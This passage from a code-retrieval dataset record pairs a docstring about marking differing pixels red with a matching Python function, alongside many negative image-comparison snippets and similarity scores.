img_2_rgb_separated[i])\n for i in range(0, len(RGB_COMPONENTS))])\n similarity_color = np.mean(similiarities_rgb)\n\n similarity_percentage = np.average([similarity_hog, similarity_color], weights=[1.2, 1])\n return float(similarity_percentage)", "def compare(model, input1, input2): \n patch_image_time_start = time.time()\n input1_patches = get_patches_non_overlap(input1, 48, 48)\n input2_patches = get_patches_non_overlap(input2, 48, 48)\n patch_image_time_end = time.time()\n compare_image_time_start = time.time()\n pred = model.predict([input1_patches, input2_patches])\n compare_image_time_end = time.time()\n\n result[\"patch_retrieval_time\"].append(patch_image_time_end - 
patch_image_time_start)\n result[\"image_comparison_time\"].append(compare_image_time_end - compare_image_time_start)\n\n return np.sum(pred)", "def ff_correct_image(image):\n pass", "def ff_correct_image(image):\n pass", "def assert_widget_image(tmpdir, widget, filename, fail_now=True):\n\n # If requested, save the \"actual\" images in another directory that will be\n # preserved beyond the test run.\n\n if IMAGE_OUTPUT_DIR:\n actual = os.path.join(IMAGE_OUTPUT_DIR, filename)\n else:\n actual = tmpdir.join(filename).strpath\n\n widget.render(actual)\n\n # Compare to the references\n\n refdir = os.path.join(DATA, 'refimg_' + os.path.splitext(filename)[0])\n results = []\n\n for refbase in sorted(os.listdir(refdir)):\n refname = os.path.splitext(refbase)[0]\n expected = os.path.join(refdir, refbase)\n rv = compare_images(\n expected,\n actual,\n tol=IMAGE_COMPARISON_TOLERANCE,\n in_decorator=True\n )\n\n if rv is None:\n # Success! Clean up any fail images (mostly for the IMAGE_OUTPUT_DIR mode)\n for p in glob(actual.replace('.png', '_vs_*.png')):\n os.unlink(p)\n return None\n\n failpath = actual.replace('.png', '-failed-diff.png')\n newfailpath = actual.replace('.png', '_vs_%s.png' % refname)\n os.rename(failpath, newfailpath)\n results.append((refname, rv['rms']))\n\n # Nothing was good enough :-(\n #\n # We used to have machinery here to emit a \"reproduction script\" that\n # printed out Python code to recreate the image files using big\n # BASE64-encoded strings, but now we can just use Azure Pipelines artifacts.\n # Consult the Git history if the reproduction script stuff is needed again.\n\n msg = (\n 'observed image %s did not match any references to required RMS tolerance of '\n '%.2f; results were: %s'\n ) % (actual, IMAGE_COMPARISON_TOLERANCE, ', '.join('%s=%.2f' % t for t in results))\n\n if fail_now:\n pytest.fail(msg, pytrace=False)\n\n return '{}: {}'.format(filename, msg)", "def compare_reduce_with_reference(im, factor, average_diff=0.4, max_diff=1):\n reduced = im.reduce(factor)\n\n if not isinstance(factor, (list, tuple)):\n factor = (factor, factor)\n\n reference = Image.new(im.mode, reduced.size)\n area_size = (im.size[0] // factor[0], im.size[1] // factor[1])\n area_box = (0, 0, area_size[0] * factor[0], area_size[1] * factor[1])\n area = im.resize(area_size, Image.Resampling.BOX, area_box)\n reference.paste(area, (0, 0))\n\n if area_size[0] < reduced.size[0]:\n assert reduced.size[0] - area_size[0] == 1\n last_column_box = (area_box[2], 0, im.size[0], area_box[3])\n last_column = im.resize(\n (1, area_size[1]), Image.Resampling.BOX, last_column_box\n )\n reference.paste(last_column, (area_size[0], 0))\n\n if area_size[1] < reduced.size[1]:\n assert reduced.size[1] - area_size[1] == 1\n last_row_box = (0, area_box[3], area_box[2], im.size[1])\n last_row = im.resize((area_size[0], 1), Image.Resampling.BOX, last_row_box)\n reference.paste(last_row, (0, area_size[1]))\n\n if area_size[0] < reduced.size[0] and area_size[1] < reduced.size[1]:\n last_pixel_box = (area_box[2], area_box[3], im.size[0], im.size[1])\n last_pixel = im.resize((1, 1), Image.Resampling.BOX, last_pixel_box)\n reference.paste(last_pixel, area_size)\n\n assert_compare_images(reduced, reference, average_diff, max_diff)", "def compare_images(original_img, transformed_img):\r\n original_img = np.array(original_img, np.float32)\r\n transformed_img = np.array(transformed_img, np.float32)\r\n\r\n mse = metrics.mean_squared_error(original_img, transformed_img)\r\n nrmse = 
metrics.normalized_root_mse(original_img, transformed_img)\r\n ssim = metrics.structural_similarity(original_img, transformed_img)\r\n psnr = metrics.peak_signal_noise_ratio(original_img, transformed_img, data_range=255)\r\n\r\n return {\"MSE\": mse, \"NRMSE\": nrmse, \"PSNR\": psnr, \"SSIM\": ssim}", "def test_Image():\n assert Image(cur, \"Simple_Linear\").detect_image() == True\n assert Image(cur, \"Logistic_Linear\").detect_image() == False\n assert Image(cur, \"Simple_Linear\").date == \"2021-04-20\"\n assert Image(cur, \"Breslow-Day_Test\").source == \"Course BIOSTAT703 slide\"", "def pairing(left, right):\n # same class: 0\n if left[label] == right[label]:\n flag = 0\n # not same: 1\n else:\n flag = 1\n return tf.cast(left[\"image\"], tf.float32) / 255., tf.cast(right[\"image\"], tf.float32) / 255., tf.cast(flag, tf.float32)", "def compare(buffer1, buffer2, threshold=0):\n # Count changed pixels\n changedPixels = 0\n print \"In compare buf1: %s buf2: %s\" % (buffer1, buffer2)\n for x in xrange(0, 100):\n # Scan one line of image then check sensitivity for movement\n for y in xrange(0, 75):\n # Just check green channel as it's the highest quality channel\n pixdiff = abs(buffer1[x, y][1] - buffer2[x, y][1])\n if pixdiff > threshold:\n changedPixels += 1", "def test_one_image(self, img):\n return self.__image_pipeline(img)", "def image_hash(image_location):\n image = pygame.image.load(image_location)\n grey = greyscale(image)\n avg = average_image_value(grey)\n\n bitstring = ''\n for pixels in get_pixels(grey):\n if pixels[0] < avg:\n bitstring += '1'\n else: bitstring += '0'\n hash = int(bitstring, 2).__format__('016x').upper()\n return hash", "def similarity_score(self, img1, img2):\n\t\t# resize into the same shape first\n\t\tif img1.shape != img2.shape:\n\t\t\tv, h = max(img1.shape[0], img2.shape[0]), max(img1.shape[1], img2.shape[1])\n\t\t\tdim = (h, v)\n\t\t\th_scale = min(img1.shape[1], img2.shape[1]) / h\n\t\t\tv_scale = min(img1.shape[0], img2.shape[0]) / v\n\t\t\timg1 = cv2.resize(img1, dim, interpolation = cv2.INTER_AREA)\n\t\t\timg2 = cv2.resize(img2, dim, interpolation = cv2.INTER_AREA)\n\t\t# # histogram\n\t\t# diff = 0\n\t\t# for c in range(3):\n\t\t# \thist1 = cv2.calcHist([img1], [c], None, [256], [0, 256])\n\t\t# \thist2 = cv2.calcHist([img2], [c], None, [256], [0, 256])\n\t\t# \tdiff += np.linalg.norm(hist1 - hist2)\n\n\t\t# HoG\n\t\tfd1, _ = hog(img1, orientations=8, pixels_per_cell=(16, 16),\n cells_per_block=(1, 1), visualize=True, multichannel=True)\n\t\tfd2, _ = hog(img2, orientations=8, pixels_per_cell=(16, 16),\n cells_per_block=(1, 1), visualize=True, multichannel=True)\n\t\t# Combine both\n\t\tdist = np.linalg.norm(fd1 - fd2)\n\t\taim = mean_pixel_intensity_diff(img1, img2)\n\t\tscore = 1 / (dist + aim + 1)\n\t\treturn score", "def test_replace_image(self):\n pass", "def _compare_images(self, ax, filename, tol=10):\n assert isinstance(ax, Artist)\n if GENERATE_BASELINE:\n savefig(os.path.join(BASELINE_DIR, filename))\n savefig(os.path.join(self.tempdir, filename))\n err = compare_images(os.path.join(BASELINE_DIR, filename),\n os.path.join(self.tempdir, filename),\n tol, in_decorator=True)\n if err:\n raise ImageComparisonFailure('images not close: %(actual)s '\n 'vs. 
%(expected)s '\n '(RMS %(rms).3f)' % err)", "def test_filter_image():\n\n model = Instafilter(\"Lo-Fi\")\n\n f_image = __local__ / \"Normal.jpg\"\n\n img0 = cv2.imread(str(f_image))\n img1 = model(f_image)\n\n diff = (img0 - img1).sum()\n\n assert abs(diff) > 0", "def diffImage(storedFrame,currentFrame,pixThreshold):\n\n diff = cv2.absdiff(storedFrame,currentFrame)\n _,diff = cv2.threshold(diff,pixThreshold[0],255,cv2.THRESH_BINARY)\n diff = diff / 255\n return diff", "async def _process_image(self, image: Image) -> Optional[Image]:\n\n # not enabled?\n if not self._enabled:\n return None\n\n # we only accept OBJECT images\n if image.header[\"IMAGETYP\"] != \"object\":\n return None\n\n # reference header?\n if self._ref_header is None:\n log.info(\"Setting new reference image...\")\n await self._reset_guiding(image=image)\n return None\n\n # check RA/Dec in header and separation\n c1 = SkyCoord(ra=image.header[\"TEL-RA\"] * u.deg, dec=image.header[\"TEL-DEC\"] * u.deg, frame=\"icrs\")\n c2 = SkyCoord(ra=self._ref_header[\"TEL-RA\"] * u.deg, dec=self._ref_header[\"TEL-DEC\"] * u.deg, frame=\"icrs\")\n separation = c1.separation(c2).deg\n if self._separation_reset is not None and separation * 3600.0 > self._separation_reset:\n log.warning(\n 'Nominal position of reference and new image differ by %.2f\", resetting reference...',\n separation * 3600.0,\n )\n await self._reset_guiding(image=image)\n return None\n\n # check filter\n if (\n self._reset_at_filter\n and \"FILTER\" in image.header\n and \"FILTER\" in self._ref_header\n and image.header[\"FILTER\"] != self._ref_header[\"FILTER\"]\n ):\n log.warning(\"The filter has been changed since the last exposure, resetting reference...\")\n await self._reset_guiding(image=image)\n return None\n\n # get time\n date_obs = Time(image.header[\"DATE-OBS\"])\n\n # check times and focus\n if self._last_header is not None:\n # check times\n t0 = Time(self._last_header[\"DATE-OBS\"])\n if (date_obs - t0).sec > self._max_interval:\n log.warning(\"Time between current and last image is too large, resetting reference...\")\n await self._reset_guiding(image=image)\n return None\n if (date_obs - t0).sec < self._min_interval:\n log.warning(\"Time between current and last image is too small, ignoring image...\")\n return None\n\n # check focus\n if (\n \"TEL-FOCU\" in image.header\n and self._reset_at_focus\n and abs(image.header[\"TEL-FOCU\"] - self._last_header[\"TEL-FOCU\"]) > 0.05\n ):\n log.warning(\"Focus difference between current and last image is too large, resetting reference...\")\n await self._reset_guiding(image=image)\n return None\n\n # exposure time too large?\n if self._max_exposure_time is not None and image.header[\"EXPTIME\"] > self._max_exposure_time:\n log.warning(\"Exposure time too large, skipping auto-guiding for now...\")\n self._loop_closed = False\n return None\n\n # remember header\n self._last_header = image.header\n\n # get offset\n image = await self.run_pipeline(image)\n\n # get telescope\n try:\n telescope = await self.proxy(self._telescope, ITelescope)\n except ValueError:\n log.error(\"Given telescope does not exist or is not of correct type.\")\n self._loop_closed = False\n return image\n\n # apply offsets\n try:\n if await self._apply(image, telescope, self.location):\n self._loop_closed = True\n log.info(\"Finished image.\")\n else:\n log.info(\"Could not apply offsets.\")\n self._loop_closed = False\n except ValueError as e:\n log.info(\"Could not apply offsets: %s\", e)\n self._loop_closed = False\n\n # return image, 
in case we added important data\n return image", "def check_image_for_duplicates(original_image):\n\n original_image_hash = get_average_hash(original_image)\n\n print(f'Checking for duplicate images for {original_image}')\n\n for potential_duplicate_image in images_in_directory:\n potential_duplicate_image_hash = get_average_hash(\n potential_duplicate_image)\n\n if ((original_image != potential_duplicate_image) & compare_image_hashes(original_image_hash, potential_duplicate_image_hash)):\n return potential_duplicate_image\n\n pass", "def transform_images(img1,img2):", "def test_image_rw(self):\n from ..image import Image\n from ..io.image import read_image, write_image\n shape = (5,5)\n pix = np.random.uniform(size=shape)\n ivar = np.random.uniform(size=shape)\n mask = np.random.randint(0, 3, size=shape)\n img1 = Image(pix, ivar, mask, readnoise=1.0, camera='b0')\n write_image(self.testfile, img1)\n img2 = read_image(self.testfile)\n\n #- Check output datatypes\n self.assertEqual(img2.pix.dtype, np.float64)\n self.assertEqual(img2.ivar.dtype, np.float64)\n self.assertEqual(img2.mask.dtype, np.uint32)\n\n #- Rounding from keeping np.float32 on disk means they aren't equal\n self.assertFalse(np.all(img1.pix == img2.pix))\n self.assertFalse(np.all(img1.ivar == img2.ivar))\n\n #- But they should be close, and identical after float64->float32\n self.assertTrue(np.allclose(img1.pix, img2.pix))\n self.assertTrue(np.all(img1.pix.astype(np.float32) == img2.pix))\n self.assertTrue(np.allclose(img1.ivar, img2.ivar))\n self.assertTrue(np.all(img1.ivar.astype(np.float32) == img2.ivar))\n\n #- masks should agree\n self.assertTrue(np.all(img1.mask == img2.mask))\n self.assertEqual(img1.readnoise, img2.readnoise)\n self.assertEqual(img1.camera, img2.camera)\n self.assertEqual(img2.mask.dtype, np.uint32)\n\n #- should work with various kinds of metadata header input\n meta = dict(BLAT='foo', BAR='quat', BIZ=1.0)\n img1 = Image(pix, ivar, mask, readnoise=1.0, camera='b0', meta=meta)\n write_image(self.testfile, img1)\n img2 = read_image(self.testfile)\n for key in meta:\n self.assertEqual(meta[key], img2.meta[key], 'meta[{}] not propagated'.format(key))\n\n #- img2 has meta as a FITS header instead of a dictionary;\n #- confirm that works too\n write_image(self.testfile, img2)\n img3 = read_image(self.testfile)\n for key in meta:\n self.assertEqual(meta[key], img3.meta[key], 'meta[{}] not propagated'.format(key))", "def main(im1_filename: Path, im2_filename: Path) -> None:\n im1 = np.array(Image.open(im1_filename).convert(\"RGB\"))\n im2 = np.array(Image.open(im2_filename).convert(\"RGB\"))\n\n im1 = im1[:, :, ::-1]\n id_face_loc = get_bounding_boxes(im1)\n im1 = im1[:, :, ::-1]\n face_encodings = face_recognition.face_encodings(im1, id_face_loc, 10, \"large\")[0]\n\n im2 = im2[:, :, ::-1]\n cam_face_loc = get_bounding_boxes(im2)\n im2 = im2[:, :, ::-1]\n face_encodings2 = face_recognition.face_encodings(im2, cam_face_loc, 10, \"large\")[0]\n\n dist = face_recognition.face_distance([face_encodings], face_encodings2)[0]\n if dist < 0.5:\n print(f\"[+] These images belong to the same person! ({dist})\")\n else:\n print(f\"[-] These images do not belong to the same person! 
({dist})\")", "def equalize(image, name=None):\n _check_image_dtype(image)\n\n with tf.name_scope(name or \"equalize\"):\n orig_dtype = image.dtype\n image = tf.image.convert_image_dtype(image, tf.uint8, saturate=True)\n image = tf.cast(image, tf.int32)\n\n def equalize_grayscale(image_channel):\n \"\"\"Equalizes the histogram of a grayscale (2D) image.\"\"\"\n bins = tf.constant(256, tf.int32)\n\n histogram = tf.math.bincount(image_channel, minlength=bins)\n nonzero = tf.where(tf.math.not_equal(histogram, 0))\n nonzero_histogram = tf.reshape(tf.gather(histogram, nonzero), [-1])\n step = (tf.reduce_sum(nonzero_histogram) - nonzero_histogram[-1]) // (bins - 1)\n\n # use a lut similar to PIL\n def normalize(histogram, step):\n norm_histogram = (tf.math.cumsum(histogram) + (step // 2)) // step\n norm_histogram = tf.concat([[0], norm_histogram], axis=0)\n norm_histogram = tf.clip_by_value(norm_histogram, 0, bins - 1)\n return norm_histogram\n\n return tf.cond(tf.math.equal(step, 0),\n lambda: image_channel,\n lambda: tf.gather(normalize(histogram, step), image_channel))\n\n channels_first_image = tf.transpose(image, [2, 0, 1])\n channels_first_equalized_image = tf.map_fn(equalize_grayscale, channels_first_image)\n equalized_image = tf.transpose(channels_first_equalized_image, [1, 2, 0])\n\n equalized_image = tf.cast(equalized_image, tf.uint8)\n equalized_image = tf.image.convert_image_dtype(equalized_image, orig_dtype)\n return equalized_image", "def compare_group_images(directory, show_imgs=True, similarity=\"high\", compression=100):\n # list where the found duplicate/similar images are stored\n duplicates = []\n lower_res = []\n\n imgs_matrix = create_imgs_matrix(directory, compression)\n\n # search for similar images\n if similarity == \"low\":\n ref = 13000\n # search for 1:1 duplicate images\n else:\n ref = 21000\n\n main_img = 0\n compared_img = 1\n nrows, ncols = compression, compression\n srow_A = 0\n erow_A = compression\n srow_B = erow_A\n erow_B = srow_B + compression\n\n while erow_B <= imgs_matrix.shape[0]:\n while compared_img < (len(image_files)):\n # select two images from imgs_matrix\n imgA = imgs_matrix[srow_A: erow_A, # rows\n 0: ncols] # columns\n imgB = imgs_matrix[srow_B: erow_B, # rows\n 0: ncols] # columns\n # compare the images\n rotations = 0\n while image_files[main_img] not in duplicates and rotations <= 3:\n if rotations != 0:\n imgB = rotate_img(imgB)\n err = mse(imgA, imgB)\n print ( \"err:\", err)\n if err <= ref:\n if show_imgs == True:\n show_file_info(compared_img, main_img)\n add_to_list(image_files[main_img], duplicates)\n check_img_quality(directory, image_files[main_img], image_files[compared_img], lower_res)\n rotations += 1\n srow_B += compression\n erow_B += compression\n compared_img += 1\n\n srow_A += compression\n erow_A += compression\n srow_B = erow_A\n erow_B = srow_B + compression\n main_img += 1\n compared_img = main_img + 1\n\n msg = \"\\n***\\n DONE: found \" + str(len(duplicates)) + \" duplicate image pairs in \" + str(\n len(image_files)) + \" total images.\\n The following files have lower resolution:\"\n print(msg)\n return set(lower_res)", "def verify(image_path, database, model):\n\n ### START CODE HERE ###\n\n # Step 1: Compute the encoding for the image. Use img_to_encoding() see example above. 
(≈ 1 line)\n status, encoding = img_to_encoding(image_path, model, resize=True)\n if not status:\n return None, None, encoding\n\n dist = 0\n\n # Step 2: Compute distance with identity's image (≈ 1 line)\n for (name, db_enc) in database.items():\n\n dist += np.linalg.norm(db_enc - encoding)\n\n final_dist = dist / len(database)\n\n # Step 3: Open the door if dist < 0.7, else don't open (≈ 3 lines)\n if final_dist < 0.7:\n print(\"welcome home!\")\n match = True\n else:\n print(\"please go away\")\n match = False\n\n ### END CODE HERE ###\n\n return final_dist, match, encoding", "def test_check_image_color(self):\n result = analyzer.check_image_color(\"tests/test_files/sample.jpg\")\n self.assertEqual(result, \"light\")", "def setReference(this, **kargs):\n\t\t\n\t\t# Arguments\n\t\tsumSeuil = kargs.get('sumSeuil', 200)\n\t\trefSeuil = kargs.get('refSeuil', 150)\n\t\tinterval = kargs.get('interval', 0)\n\t\tcheck = kargs.get('check', False)\n\t\tcount = kargs.get('count', 1)\n\t\t\n\t\t# Image cumulative\n\t\tcumul = None\n\t\t\n\t\t# Capture image par image\n\t\tif count > 1: printf('Prise de reference sur %d prises... ' % count)\n\t\tfor i in xrange(count):\n\t\t\tif i and interval: time.sleep(interval/1000)\n\t\t\t\n\t\t\t# Prise d'image\n\t\t\tthis.getFrame()\n\t\t\t\n\t\t\t# Référence actuelle\n\t\t\tcurrent = this._FRAME\n\t\t\t\n\t\t\tif i: # Si ce n'est plus la première itération\n\t\t\t\t\n\t\t\t\tif check:\n\t\t\t\t\t# Détection d'un changement\n\t\t\t\t\tthis.detectByRef(seuil=refSeuil, ref=result, frame=current)\n\t\t\t\t\tsum = this.binary.sum()/255\n\t\t\t\t\tif sum > sumSeuil: # Crash\n\t\t\t\t\t\traise Exception(\"Don't interfere with the reference ! (%d)\" % sum)\n\t\t\t\t# END CHECK\n\t\t\t\t\n\t\t\t\t# Cumulation\n\t\t\t\tcumul += current\n\t\t\t\n\t\t\telse: # Première itération\n\t\t\t\tcumul = current.astype(int)\n\t\t\t\t\n\t\t\t# Calcul de l'image moyenne actuelle\n\t\t\tresult = (cumul / (i+1)).astype(np.uint8)\n\t\t###\n\t\t\n\t\tthis.resetBin()\n\t\tthis._REF = result\n\t\tif count > 1: print 'ok'\n\t\treturn result", "def image_reference(self, image_id):\n return self.image_info[image_id]", "def is_new_based_on_imgs(soup):\n\n \n \n prev_hashes = get_prev_img_hashes()\n temp_hashes = get_temp_img_hashes(soup)\n\n if len(temp_hashes.difference(prev_hashes))>0:\n print(\"new, based on images\")\n return True\n else:\n return False", "def do_comparex(self, str_arg):\n arg = validateString(str_arg)\n file1, fileset = arg.split(' ', 1)\n if len(fileset) == 0:\n self.resultFlag = False\n raise ValueError('Bad parameter. Please check your script.')\n if not os.path.isfile(file1):\n self.resultFlag = False\n raise ValueError(file1 + ' not exist, Please check your script.')\n # f_list=[pp1 for pp1 in fileset.split(' ') if pp1!='']\n for fn in fileset.split(' '):\n # print file1, f2\n if not os.path.isfile(fn):\n self.resultFlag = False\n raise ValueError(fn + ' not exist, Please check your script.')\n if self.__compareImage(file1, fn):\n self.resultFlag = True\n print('[Found match. 
%s and %s are identical.]' % (file1, fn))\n return\n print('[No match found.]')\n self.resultFlag = False", "def check_image(self, image, temps):\n self.logger.debug('Check image \"%s\"', image)\n _, edges = cv2.threshold(cv2.imread(image, 0), 127, 255, cv2.THRESH_BINARY)\n\n result = []\n for filename in temps:\n template = cv2.imread(filename, 0)\n width, hight = template.shape[::-1]\n\n res = cv2.matchTemplate(edges, template, cv2.TM_CCORR_NORMED)\n if self.multi:\n for point in zip(*np.where(res >= self.threshold)[::-1]):\n result.append((point, (point[0] + width, point[1] + hight)))\n else:\n _, max_val, _, max_loc = cv2.minMaxLoc(res)\n if max_val > self.threshold:\n result.append((max_loc, (max_loc[0] + width, max_loc[1] + hight)))\n return result", "def check_for_updated_image(self, image):\n for account in self.accounts:\n rc, rsp = self.cal.get_image_list(account)\n\n for curr_image in rsp.imageinfo_list:\n if curr_image.name == image.name:\n local_cksum = rift.auto.vm_utils.md5checksum(image.location)\n if local_cksum == curr_image.checksum:\n return curr_image.id\n else:\n # delete out-dated image\n logger.debug(\"Deleting openstack image: %s\", curr_image.name)\n self.cal.delete_image(account, curr_image.id)\n break\n return None", "def show_with_diff(image, reference, title):\n pl.figure(figsize=(5, 3.3))\n pl.subplot(1, 2, 1)\n pl.title('Image')\n pl.imshow(image, vmin=0, vmax=1, cmap=pl.cm.gray, interpolation='nearest')\n pl.xticks(())\n pl.yticks(())\n pl.subplot(1, 2, 2)\n difference = image - reference\n\n pl.title('Difference (norm: %.2f)' % np.sqrt(np.sum(difference ** 2)))\n pl.imshow(difference, vmin=-0.5, vmax=0.5, cmap=pl.cm.PuOr,\n interpolation='nearest')\n pl.xticks(())\n pl.yticks(())\n pl.suptitle(title, size=16)\n pl.subplots_adjust(0.02, 0.02, 0.98, 0.79, 0.02, 0.2)", "def test_binary_compare(self):\n dataset = make_fixture(binary=True, split=True)\n\n oz = ClassBalance()\n assert oz.fit(dataset.y.train, dataset.y.test) is oz\n assert oz._mode == COMPARE\n\n # oz.finalize()\n self.assert_images_similar(oz)", "def image_ref(self) -> Optional[str]:\n _args: list[Arg] = []\n _ctx = self._select(\"imageRef\", _args)\n return _ctx.execute_sync(Optional[str])", "def verify(image_path, identity, database, model):\n\n # Compute the encoding for the image.\n encoding = M.img_to_encoding(image_path, model)\n\n # Compute distance with identity's image\n dist = np.linalg.norm(database[identity] - encoding)\n\n return dist", "def brain_has_lead_image(self, brain=None):", "def track(self, image):\r\n \r\n # if the object was initialized correctrly\r\n if self.well_initialized:\r\n ok, self.object_bound_rect = self.tracker.update(image)\r\n \r\n return ok, self.object_bound_rect", "def show_with_diff(image, reference, title):\r\n plt.figure(figsize=(5, 3.3))\r\n plt.subplot(1, 2, 1)\r\n plt.title('Image')\r\n plt.imshow(image, vmin=0, vmax=1, cmap=plt.cm.gray,\r\n interpolation='nearest')\r\n plt.xticks(())\r\n plt.yticks(())\r\n plt.subplot(1, 2, 2)\r\n difference = image - reference\r\n\r\n plt.title('Difference (norm: %.2f)' % np.sqrt(np.sum(difference ** 2)))\r\n plt.imshow(difference, vmin=-0.5, vmax=0.5, cmap=plt.cm.gray,\r\n interpolation='nearest')\r\n plt.xticks(())\r\n plt.yticks(())\r\n plt.suptitle(title, size=16)\r\n plt.subplots_adjust(0.02, 0.02, 0.98, 0.79, 0.02, 0.2)\r\n #plt.savefig('omp_frames/simpleframe_{}.png'.format(framenum),image)\r\n scipy.misc.imsave('omp_frames/simpleframe_{}.png'.format(framenum), image)", "def test_quick_method(self):\n data = 
load_occupancy(return_dataset=True)\n _, y = data.to_numpy()\n\n visualizer = balanced_binning_reference(y, show=False)\n\n assert isinstance(visualizer, BalancedBinningReference)\n self.assert_images_similar(visualizer, tol=0.5)", "def trackdiffImage(storedFrame,currentFrame,pixThreshold):\n diff = cv2.absdiff(storedFrame,currentFrame)\n _,diff = cv2.threshold(diff,pixThreshold[1],255,cv2.THRESH_BINARY)\n return diff", "def cli(fig1, fig2, out):\n click.echo('\\n' + '.' * 50)\n\n # open first image\n image1 = Image.open(fig1)\n\n # open second image\n image2 = Image.open(fig2)\n\n # retrieve the image dimensions.\n width, height = image1.size\n width2, height2 = image2.size\n\n if [width, height] != [width2, height2]:\n print(\"Image dimensions do not match! The Two inputs must have equal dimensions\")\n exit(1)\n else:\n print(\"Fig1 dimensions: \", image1.size)\n print(\"Fig2 dimensions: \", image2.size)\n # Create a new image object.\n merged = Image.new('RGB', image1.size)\n\n for i in range(0, width):\n for j in range(0, height):\n ima1 = list(image1.getpixel((i, j)))\n ima2 = list(image2.getpixel((i, j)))\n if ima1 == ima2:\n r, g, b, a = ima1\n elif [ima1[0], ima1[1], ima1[2]] == [0, 0, 0] and [ima2[0], ima2[1], ima2[2]] != [0, 0, 0]:\n r, g, b, a = ima2\n elif [ima1[0], ima1[1], ima1[2]] != [0, 0, 0] and [ima2[0], ima2[1], ima2[2]] == [0, 0, 0]:\n r, g, b, a = ima1\n elif [ima1[0], ima1[1], ima1[2]] != [0, 0, 0] and ima2 == [255, 255, 255, 255]:\n r, g, b, a = ima1\n elif [ima2[0], ima2[1], ima2[2]] != [0, 0, 0] and ima1 == [255, 255, 255, 255]:\n r, g, b, a = ima2\n else:\n # print ima1,ima2\n r = (ima1[0] + ima2[0]) // 2\n g = (ima1[1] + ima2[1]) // 2\n b = (ima1[2] + ima2[2]) // 2\n a = 255\n # print [r,g,b,a]\n\n merged.putpixel((i, j), (r, g, b, a))\n merged.save(out)\n click.echo('\\n' + '.' * 50)", "def compare(image_a, image_b):\n image_a = standardize_format(image_a)\n grayscale_image_a = to_grayscale(image_a)\n image_b = standardize_format(image_b)\n grayscale_image_b = to_grayscale(image_b)\n err = mse(grayscale_image_a, grayscale_image_b)\n return err", "def image_search_in_image(base_image, looking_for_img):\n base_image = cv2.imread(base_image)\n looking_for_img = cv2.imread(looking_for_img)\n # result = cv2.matchTemplate(base_image, looking_for_img, cv2.TM_SQDIFF_NORMED)\n result = cv2.matchTemplate(base_image, looking_for_img, cv2.TM_CCOEFF)\n (_, _, minLoc, maxLoc) = cv2.minMaxLoc(result)\n print(result)\n (waldoHeight, waldoWidth) = looking_for_img.shape[:2]\n topLeft = maxLoc\n botRight = (topLeft[0] + waldoWidth, topLeft[1] + waldoHeight)\n roi = base_image[topLeft[1]:botRight[1], topLeft[0]:botRight[0]]\n mask = np.zeros(base_image.shape, dtype=\"uint8\")\n puzzle = cv2.addWeighted(base_image, 0.25, mask, 0.75, 0)\n puzzle[topLeft[1]:botRight[1], topLeft[0]:botRight[0]] = roi\n cv2.imshow(\"Puzzle\", puzzle)\n cv2.imshow(\"Waldo\", looking_for_img)\n cv2.waitKey(0)", "def pixel_diff(image_a, image_b):\n\n if image_a.size != image_b.size:\n raise ImageCompareException(\n \"different image sizes, can only compare same size images: A=\" + str(image_a.size) + \" B=\" + str(\n image_b.size))\n\n if image_a.mode != image_b.mode:\n raise ImageCompareException(\n \"different image mode, can only compare same mode images: A=\" + str(image_a.mode) + \" B=\" + str(\n image_b.mode))\n\n diff = ImageChops.difference(image_a, image_b)\n diff = diff.convert('L')\n\n return diff" ]
[ "0.7269888", "0.69743997", "0.6905206", "0.6846669", "0.67375135", "0.6730658", "0.67301905", "0.67132235", "0.6670823", "0.66276044", "0.65917426", "0.6564198", "0.65512747", "0.6517447", "0.65027654", "0.6423081", "0.64036614", "0.63828444", "0.6322787", "0.6311486", "0.6288014", "0.62783784", "0.6207361", "0.61736023", "0.6167509", "0.6166918", "0.61359656", "0.61344427", "0.61184293", "0.61070365", "0.60898244", "0.6050134", "0.60421544", "0.6014812", "0.5997404", "0.5991177", "0.5981526", "0.59572244", "0.5929", "0.5920695", "0.5920464", "0.5919974", "0.59162235", "0.5898405", "0.5897941", "0.58974624", "0.58899194", "0.5870713", "0.58622473", "0.5854621", "0.5854573", "0.5853867", "0.5852895", "0.585183", "0.5838607", "0.5838495", "0.58347297", "0.58321846", "0.58321846", "0.583183", "0.58249897", "0.5821577", "0.58098376", "0.5805308", "0.5785296", "0.5784873", "0.57767516", "0.5742973", "0.5736112", "0.57329124", "0.571598", "0.5714831", "0.5712934", "0.5692577", "0.5661061", "0.56572336", "0.56569237", "0.56412625", "0.56394106", "0.5637941", "0.5635137", "0.5627088", "0.5618976", "0.56158686", "0.5603021", "0.55971545", "0.5589831", "0.5561038", "0.55600023", "0.55573964", "0.5552458", "0.5547989", "0.55328584", "0.5526937", "0.55248994", "0.55239534", "0.5513896", "0.55080724", "0.55053955", "0.54988235" ]
0.7576849
0
From a matrix of difference pixels (for each pixel, 0 if the pixel is the same, nonzero if it differs), creates a list of the differing pixels and a PNG image of the same size as the 'step' image, where each differing pixel is coloured RED
def _build_list_of_changed_pixels(self, diff, image_width, image_height, min_width, min_height, exclude_zones): # pad the diff "image" to the size of the step image diff = numpy.pad(diff, ((0, max(0, image_height - min_height)), (0, max(0, image_width - min_width))), constant_values=1) # ignore excluded pixels diff *= self._build_list_of_excluded_pixels2(exclude_zones, image_width, image_height) # draw mask of differences mask = numpy.ones((image_height, image_width, 1), dtype=uint8) diff_image = numpy.zeros((image_height, image_width, 4), dtype=uint8) cnd = diff[:,:] > 0 # marks which pixels are non-zero diff_image[cnd] = mask[cnd] diff_image *= numpy.array([0, 0, 255, 255], dtype=uint8) # paint differing pixels red diff_pixels = numpy.transpose(diff.nonzero()) return diff_pixels, diff_image
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
